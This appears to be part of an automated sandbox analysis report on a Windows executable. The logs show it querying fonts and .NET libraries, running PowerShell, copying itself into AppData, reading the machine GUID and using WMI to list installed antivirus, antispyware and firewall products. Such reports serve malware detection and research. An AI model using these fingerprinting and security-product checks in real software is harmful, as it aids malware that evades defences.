                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Users\user\Desktop\nzLoHpgAln.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: nzLoHpgAln.exe, 00000008.00000002.1876390947.000000000667F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
